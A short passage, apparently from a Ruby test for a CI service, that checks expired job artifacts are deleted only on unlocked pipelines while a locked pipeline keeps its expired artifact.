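expired.job.pipeline.unlocked!

locked = create(:ci_job_artifact, expire_at: 1.day.ago)
locked.job.pipeline.artifacts_locked!

Ci::DestroyExpiredJobArtifactsService.new.execute
# Only the artifact on the unlocked pipeline is destroyed; the locked
# pipeline keeps its expired artifact.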